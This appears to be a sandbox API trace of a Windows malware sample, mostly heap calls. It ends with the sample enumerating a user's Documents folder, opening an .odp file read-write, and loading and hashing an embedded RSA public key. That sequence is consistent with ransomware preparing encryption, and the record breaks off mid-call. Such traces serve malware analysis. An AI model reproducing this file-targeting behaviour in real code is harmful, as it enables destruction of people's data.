HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.532] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0192.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b28 [0192.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.533] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3b28 | out: hHeap=0x2c0000) returned 1 [0192.533] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.534] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.534] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.534] PathFindFileNameW (pszPath="") returned="" [0192.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.535] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0192.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.536] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.537] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8906d050, ftCreationTime.dwHighDateTime=0x1d898b4, ftLastAccessTime.dwLowDateTime=0x5fe6cbb0, ftLastAccessTime.dwHighDateTime=0x1d89b8b, ftLastWriteTime.dwLowDateTime=0x5fe6cbb0, ftLastWriteTime.dwHighDateTime=0x1d89b8b, nFileSizeHigh=0x0, nFileSizeLow=0x1752a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6_x m.odp", cAlternateFileName="6_XM~1.ODP")) returned 1 [0192.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0192.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.537] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\6_x m.odp") returned=".odp" [0192.537] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\6_x m.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\6_x m.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.539] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=95530) returned 1 [0192.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.543] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17504, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.543] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.545] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.545] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1752a, lpOverlapped=0x0) returned 1 [0192.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.546] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.547] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.547] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.547] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.548] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.548] GetLastError () returned 0x0 [0192.548] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.548] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.548] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.548] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.548] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17530) returned 0x2af5168 [0192.549] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b28 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b70 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 